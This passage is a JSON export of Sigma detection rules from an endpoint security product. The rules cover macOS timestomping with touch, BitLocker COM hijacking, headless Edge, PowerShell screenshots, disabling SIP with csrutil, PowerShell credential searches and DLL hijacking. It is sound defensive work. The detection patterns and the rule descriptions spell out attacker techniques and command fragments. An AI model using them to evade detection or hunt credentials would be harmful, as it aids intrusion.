"https://attack.mitre.org/techniques/T1070/006/"
],
"name": "t1070_006_touch_timestomp_macos.yml",
"content": "title: File Timestamps Altered via Touch (macOS)\nid: c566c912-0ee9-4945-a27e-417c0403b2ef\ndescription: |\n Detects the usage of the touch command to alter file access and modification times.\n This is used by attackers to mimic the timestamp of other files in the same directory.\n It is recommended to check if the modification is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md\n - https://attack.mitre.org/techniques/T1070/006/\ndate: 2022/08/25\nmodified: 2025/07/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.006\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: '/touch'\n CommandLine|contains:\n - ' -a '\n - ' -ac '\n - ' -ca '\n - ' -t '\n - ' -ct '\n - ' -d '\n - ' -cd '\n - ' --date'\n - ' -r '\n - ' -cr '\n - '--reference'\n\n # change only the access time using STAMP\n - ' -at'\n - ' -act'\n - ' -cat'\n # change only the modification time using STAMP\n - ' -mt'\n - ' -mct'\n - ' -cmt'\n # change access and modification times using STAMP\n - ' -amt'\n - ' -mat'\n - ' -amct'\n - ' -mact'\n - ' -camt'\n - ' -cmat'\n - ' -mcat'\n - ' -acmt'\n\n # change only the access time using STRING\n - ' -ad'\n - ' -acd'\n - ' -cad'\n # change only the modification time using STRING\n - ' -md'\n - ' -mcd'\n - ' -cmd'\n # change access and modification times using STRING\n - ' -amd'\n - ' -mad'\n - ' -amcd'\n - ' -macd'\n - ' -camd'\n - ' -cmad'\n - ' -mcad'\n - ' -acmd'\n\n # change only the acess time using reference file\n - ' -ar'\n - ' -acr'\n - ' -car'\n # change only the modification time using reference file\n - ' -mr'\n - ' -mcr'\n - ' -cmr'\n # change access and modification times using reference file\n - ' -amr'\n - ' -mar'\n - ' -amcr'\n - ' -macr'\n - ' -camr'\n - ' -cmar'\n - ' -mcar'\n - ' -acmr'\n\n # 
touch -r /tmp/KSInstallAction.aD9q7Aw3bv/m/.patch/application.dirpatch /var/folders/l7/kzb_3gd56bl4lgqkkmzb9wt40000gn/T/keystone_install.4MQDcLZ1/Google Chrome.app\n # touch -r /tmp/KSInstallAction.MXP23s6QRN/m/.patch/framework_108.0.5359.98_108.0.5359.124.dirpatch/Resources/th.lproj /Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/108.0.5359.124/Resources/th.lproj\n exclusion_google_chrome_updater:\n GrandparentCommandLine|startswith: '/bin/bash -p /tmp/KSInstallAction'\n CommandLine|contains|all:\n - 'touch -r /tmp/KSInstallAction'\n - 'Google Chrome.app'\n\n exclusion_google_chrome_universal_update:\n CommandLine:\n - 'touch -r /Volumes/Google Chrome * universal Update/.patch/application.dirpatch*'\n - 'touch -r /Volumes/Google Chrome * universal Update/.patch/framework_*.dirpatch*'\n - 'touch -r /Volumes/Google Chrome Dev * Update/.patch/application.dirpatch*'\n - 'touch -r /Volumes/Google Chrome Dev * Update/.patch/framework_*.dirpatch*'\n\n # /bin/bash /usr/local/f-secure/bin/launchd_wrapper com.f-secure.fsmac.licensetool /usr/local/f-secure/fssp/bin/licensetool --update\n exclusion_fsecure_license_updater:\n ProcessGrandparentImage: '/sbin/launchd'\n ProcessParentCommandLine|contains: '/usr/local/f-secure/bin/launchd_wrapper'\n\n exclusion_fbreactnativespec:\n CurrentDirectory: '/Users/*/node_modules/react-native/*'\n\n exclusion_chrome:\n Ancestors|contains:\n - '|/Library/Application Support/Google/GoogleUpdater/*/GoogleUpdater.app/Contents/MacOS/GoogleUpdater|'\n - '|/Users/*/Library/Application Support/Google/GoogleUpdater/*/GoogleUpdater.app/Contents/MacOS/GoogleUpdater|'\n\n exclusion_vmware:\n CommandLine: 'touch -r /library/application support/vmware/vmware fusion/services/contents/library/vmnet-cli -- /library/preferences/vmware fusion/networking'\n ParentCommandLine: '/bin/bash -p /library/application support/vmware/vmware fusion/services/contents/library/services/services.sh --start'\n 
GrandparentCommandLine|startswith: '/Library/Application Support/VMware/VMware Fusion/Services/Contents/Library/services/VMware Fusion Services'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith: '/bin/sh /tmp/PKInstallSandbox.??????/'\n\n exclusion_snapgene:\n ProcessParentImage:\n - '/Applications/SnapGene.app/Contents/MacOS/SnapGene'\n - '/Users/*/Applications/SnapGene.app/Contents/MacOS/SnapGene'\n\n exclusion_upnote:\n ProcessGrandparentImage: '/Applications/UpNote.app/Contents/MacOS/UpNote'\n\n exclusion_envman:\n ProcessCommandLine: 'touch -a /Users/*/.config/envman/*'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c566c912-0ee9-4945-a27e-417c0403b2ef",
"rule_name": "File Timestamps Altered via Touch (macOS)",
"rule_description": "Detects the usage of the touch command to alter file access and modification times.\nThis is used by attackers to mimic the timestamp of other files in the same directory.\nIt is recommended to check if the modification is legitimate.\n",
"rule_creation_date": "2022-08-25",
"rule_modified_date": "2025-07-07",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c5c3eec3-cf96-44dc-b46a-b56808eb2ab0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090747Z",
"creation_date": "2026-03-23T11:45:34.090749Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090753Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ipurple.team/2025/08/04/lateral-movement-bitlocker/",
"https://github.com/rtecCyberSec/BitlockMove",
"https://attack.mitre.org/techniques/T1021/003/"
],
"name": "t1021_003_bitlockmove.yml",
"content": "title: Bitlocker COM Hijacking Lateral Movement\nid: c5c3eec3-cf96-44dc-b46a-b56808eb2ab0\ndescription: |\n Detects COM object hijacking attempts targeting the BaaUpdate.exe process within BitLocker encryption services.\n Attackers can exploit this technique to hijack BitLocker's COM interface through registry manipulation, allowing them to execute malicious code within the trusted context of legitimate BitLocker update processes and achieve lateral movement across domain-joined encrypted systems.\n It is recommended to immediately isolate affected systems, investigate the source of COM hijacking by analyzing registry changes and unauthorized DLL modifications and correlate with authentication logs to identify potential lateral movement paths.\nreferences:\n - https://ipurple.team/2025/08/04/lateral-movement-bitlocker/\n - https://github.com/rtecCyberSec/BitlockMove\n - https://attack.mitre.org/techniques/T1021/003/\ndate: 2025/09/23\nmodified: 2025/09/30\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.003\n - attack.discovery\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\CLSID\\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50}\\InProcServer32\\(Default)'\n Details|endswith: '.dll'\n IsPreviousDetailsSet: false\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c5c3eec3-cf96-44dc-b46a-b56808eb2ab0",
"rule_name": "Bitlocker COM Hijacking Lateral Movement",
"rule_description": "Detects COM object hijacking attempts targeting the BaaUpdate.exe process within BitLocker encryption services.\nAttackers can exploit this technique to hijack BitLocker's COM interface through registry manipulation, allowing them to execute malicious code within the trusted context of legitimate BitLocker update processes and achieve lateral movement across domain-joined encrypted systems.\nIt is recommended to immediately isolate affected systems, investigate the source of COM hijacking by analyzing registry changes and unauthorized DLL modifications and correlate with authentication logs to identify potential lateral movement paths.\n",
"rule_creation_date": "2025-09-23",
"rule_modified_date": "2025-09-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.discovery",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.003",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c5daf312-dbde-4955-91e7-9f1c2f5c1d53",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084069Z",
"creation_date": "2026-03-23T11:45:34.084071Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084076Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402",
"https://www.zscaler.com/blogs/security-research/steal-it-campaign",
"https://attack.mitre.org/techniques/T1567/",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1102/"
],
"name": "t1567_msedge_headless_mode.yml",
"content": "title: Microsoft Edge Run in Headless Mode\nid: c5daf312-dbde-4955-91e7-9f1c2f5c1d53\ndescription: |\n Detects the execution of Microsoft Edge in headless mode.\n Attackers can use browsers in headless mode to download payloads or to make their exfiltration process more stealthy.\n It is recommended to analyze the parent process for malicious content to determine the legitimacy of this action.\nreferences:\n - https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402\n - https://www.zscaler.com/blogs/security-research/steal-it-campaign\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1102/\ndate: 2023/09/07\nmodified: 2025/10/28\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1567\n - attack.command_and_control\n - attack.t1105\n - attack.t1102\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n Image|endswith: '\\msedge.exe'\n CommandLine|contains: '--headless'\n\n exclusion_parent_edge:\n ParentImage|endswith: '\\msedge.exe'\n\n exclusion_vscode:\n ParentImage|endswith: '\\Code.exe'\n\n exclusion_avira:\n ParentImage:\n - '?:\\Program Files\\Avira\\Endpoint Protection SDK\\endpointprotection.exe'\n - '?:\\Program Files (x86)\\Avira\\Endpoint Protection SDK\\endpointprotection.exe'\n\n exclusion_unity_pdf:\n ParentImage|endswith: '\\Unity.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Unity Technologies Aps'\n CommandLine|contains: '--print-to-pdf='\n\n exclusion_nodejs:\n ParentImage|endswith: '\\node.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'OpenJS Foundation'\n\n exclusion_microsoftdriver:\n ProcessParentInternalName: 'msedgedriver_exe'\n ProcessParentSigned: 'true'\n 
ProcessParentSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_notatext:\n ParentImage: '?:\\Program Files (x86)\\NS SOFT\\NotaNext\\NotaNext.exe'\n\n exclusion_r:\n ParentImage:\n - '?:\\Program Files\\R\\R-*\\bin\\x64\\Rterm.exe'\n - '?:\\Program Files\\RStudio\\resources\\app\\bin\\rsession-utf8.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\RStudio\\resources\\app\\bin\\rsession-utf8.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c5daf312-dbde-4955-91e7-9f1c2f5c1d53",
"rule_name": "Microsoft Edge Run in Headless Mode",
"rule_description": "Detects the execution of Microsoft Edge in headless mode.\nAttackers can use browsers in headless mode to download payloads or to make their exfiltration process more stealthy.\nIt is recommended to analyze the parent process for malicious content to determine the legitimacy of this action.\n",
"rule_creation_date": "2023-09-07",
"rule_modified_date": "2025-10-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1102",
"attack.t1105",
"attack.t1567"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c5fe22a8-0044-400d-ab37-d3a48796aa0b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611555Z",
"creation_date": "2026-03-23T11:45:34.611558Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611566Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen",
"https://www.powershellgallery.com/packages/GAT/1.2.0/Content/Functions%5CSave-Screenshot.ps1",
"https://attack.mitre.org/techniques/T1113/"
],
"name": "t1113_possible_screenshot_taken_powershell.yml",
"content": "title: Screen Capture Taken via PowerShell\nid: c5fe22a8-0044-400d-ab37-d3a48796aa0b\ndescription: |\n Detects the usage of PowerShell to take screenshots on a host.\n Attackers may attempt to take screenshots to gather information on a running operation.\n It is recommended to investigate the PowerShell command as well as other malicious commands executed on the host to determine legitimacy.\nreferences:\n - https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen\n - https://www.powershellgallery.com/packages/GAT/1.2.0/Content/Functions%5CSave-Screenshot.ps1\n - https://attack.mitre.org/techniques/T1113/\ndate: 2022/11/17\nmodified: 2025/03/12\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1113\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Collection\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_copy:\n PowershellCommand|contains:\n - '.CopyFromScreen '\n - '.CopyFromScreen('\n\n selection_bitmap:\n PowershellCommand|contains:\n - 'Drawing.Bitmap '\n - 'Drawing.Bitmap('\n\n exclusion_activedirectory:\n ProcessCommandLine|endswith: '\\powershell.exe -noexit -command import-module ActiveDirectory'\n PowershellCommand|contains:\n - 'function Get-ScreenPNG {'\n - 'function Set-ClipboardScreenshot {'\n\n exclusion_agicorp:\n PowershellScriptPath: '?:\\Program Files (x86)\\AgiCorp\\\\*\\Updater.ps1'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c5fe22a8-0044-400d-ab37-d3a48796aa0b",
"rule_name": "Screen Capture Taken via PowerShell",
"rule_description": "Detects the usage of PowerShell to take screenshots on a host.\nAttackers may attempt to take screenshots to gather information on a running operation.\nIt is recommended to investigate the PowerShell command as well as other malicious commands executed on the host to determine legitimacy.\n",
"rule_creation_date": "2022-11-17",
"rule_modified_date": "2025-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1113"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c63b800c-c4a0-41fa-aaa0-f278bb36b73d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.616927Z",
"creation_date": "2026-03-23T11:45:34.616930Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616938Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/v/fr/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_sip_disbaled_via_csrutil.yml",
"content": "title: System Integrity Protection Disabled via csrutil\nid: c63b800c-c4a0-41fa-aaa0-f278bb36b73d\ndescription: |\n Detects the execution of csrutil to disable System Integrity Protection (SIP) on macOS.\n SIP is a security feature of macOS that restricts the root user account and limits the actions that the root user can perform on protected parts of the system.\n Disabling SIP allows an attacker to modify protected parts of the system, such as system binaries, and to install malicious software.\n It is recommended to check csrutil's execution context to look for suspicious processes.\nreferences:\n - https://book.hacktricks.xyz/v/fr/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/07/03\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Csrutil\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/csrutil'\n CommandLine|contains: ' disable'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c63b800c-c4a0-41fa-aaa0-f278bb36b73d",
"rule_name": "System Integrity Protection Disabled via csrutil",
"rule_description": "Detects the execution of csrutil to disable System Integrity Protection (SIP) on macOS.\nSIP is a security feature of macOS that restricts the root user account and limits the actions that the root user can perform on protected parts of the system.\nDisabling SIP allows an attacker to modify protected parts of the system, such as system binaries, and to install malicious software.\nIt is recommended to check csrutil's execution context to look for suspicious processes.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-01-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c69bf5ad-bc75-4b74-a48c-2c8840f0068d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081307Z",
"creation_date": "2026-03-23T11:45:34.081309Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081313Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/credentials-hunting",
"https://intrusionz3r0.gitbook.io/intrusionz3r0/enumeration/139-445-smb-enumeration",
"https://attack.mitre.org/techniques/T1552/001/"
],
"name": "t1552_001_powershell_credential_search.yml",
"content": "title: Unsecured Credentials Enumerated via PowerShell\nid: c69bf5ad-bc75-4b74-a48c-2c8840f0068d\ndescription: |\n Detects PowerShell script blocks that may be used to look for unsecured credentials on disk.\n Attackers may try to enumerate files on disks or shares that contain credentials for further lateral movement.\n It is recommended to investigate activity surrounding this event and to hunt for any authentications to possibly affected accounts after this alert.\nreferences:\n - https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/credentials-hunting\n - https://intrusionz3r0.gitbook.io/intrusionz3r0/enumeration/139-445-smb-enumeration\n - https://attack.mitre.org/techniques/T1552/001/\ndate: 2025/12/31\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.006\n - attack.t1552.001\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_select_string_generic:\n ScriptBlockText|contains: 'Select-String'\n\n selection_select_string_patterns:\n ScriptBlockText|contains:\n - '-Pattern cred'\n - '-Pattern ?cred'\n - '-Pattern pass'\n - '-Pattern ?pass'\n\n selection_direct_select_string_1:\n ScriptBlockText|contains:\n - 'Select-String ?cred?'\n - 'Select-String ?pass?'\n\n selection_tree_1:\n ScriptBlockText|contains|all:\n - 'Get-ChildItem'\n - '-Include \\*cred\\*'\n\n selection_tree_2:\n ScriptBlockText|contains|all:\n - 'Get-ChildItem'\n - '-Include \\*pass\\*'\n\n exclusion_common_words:\n ScriptBlockText|contains:\n - 'Select-String ?PasswordComplexity'\n - 'Select-String -Pattern ?passed'\n - 'Select-String ?passed'\n - \"-Pattern Password is cleared\" # Dell BIOS\n\n exclusion_cyberwatch:\n ProcessAncestors|contains: 
'\\CyberwatchAgent\\cyberwatch-agent.exe'\n\n exclusion_toast_notification:\n ScriptBlockText|contains: '$Toast = [Windows.UI.Notifications.ToastNotification]::new($SerializedXml)'\n\n exclusion_defender:\n ProcessParentImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n\n condition: (\n (selection_select_string_generic and selection_select_string_patterns) or\n 1 of selection_direct_select_string_* or\n 1 of selection_tree_*\n ) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c69bf5ad-bc75-4b74-a48c-2c8840f0068d",
"rule_name": "Unsecured Credentials Enumerated via PowerShell",
"rule_description": "Detects PowerShell script blocks that may be used to look for unsecured credentials on disk.\nAttackers may try to enumerate files on disks or shares that contain credentials for further lateral movement.\nIt is recommended to investigate activity surrounding this event and to hunt for any authentications to possibly affected accounts after this alert.\n",
"rule_creation_date": "2025-12-31",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1552.001",
"attack.t1552.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c6ab5a90-c228-4457-bf00-f332a4806ca0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079129Z",
"creation_date": "2026-03-23T11:45:34.079132Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079136Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_provlaunch.yml",
"content": "title: DLL Hijacking via provlaunch.exe\nid: c6ab5a90-c228-4457-bf00-f332a4806ca0\ndescription: |\n Detects potential Windows DLL Hijacking via provlaunch.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'provlaunch'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\msvcp110_win.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c6ab5a90-c228-4457-bf00-f332a4806ca0",
"rule_name": "DLL Hijacking via provlaunch.exe",
"rule_description": "Detects potential Windows DLL Hijacking via provlaunch.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c6ae380a-a730-47c7-8fba-c5056f4a8cd7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590765Z",
"creation_date": "2026-03-23T11:45:34.590769Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590776Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
